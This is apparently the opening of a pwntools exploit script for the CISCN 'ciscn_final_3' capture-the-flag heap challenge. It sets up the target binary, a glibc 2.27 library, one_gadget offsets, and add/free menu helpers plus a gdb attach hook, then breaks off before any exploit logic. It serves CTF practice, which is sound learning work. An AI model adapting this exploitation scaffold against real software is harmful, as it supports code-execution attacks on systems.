ciscn_final_3
from pwn import *
arch = "amd64"
filename = "ciscn_final_3"
context(os="linux", arch=arch, log_level="debug")
content = 0
offset = 0
elf = ELF(filename)
libc=ELF("/home/giantbranch/Desktop/ctfpwn/clibcc/pwn-change-libc-main/libs/2.27-3ubuntu1_amd64/libc-2.27.so")
ogg_libc=[0x4f2c5,0x4f322,0x10a38c]
def add(idx,size,payload):
io.recvuntil("choice > ")
io.sendline("1")
io.recvuntil("input the index")
io.sendline(str(idx))
io.recvuntil("input the size")
io.sendline(str(size))
io.recvuntil("now you can write something")
io.send(payload)
def free(idx):
io.recvuntil("choice > ")
io.sendline("2")
io.recvuntil("input the index")
io.sendline(str(idx))
def b(addr):
bk = "b *$rebase" + str(addr)
gdb.attach(io, bk)
success("attach")
def main():</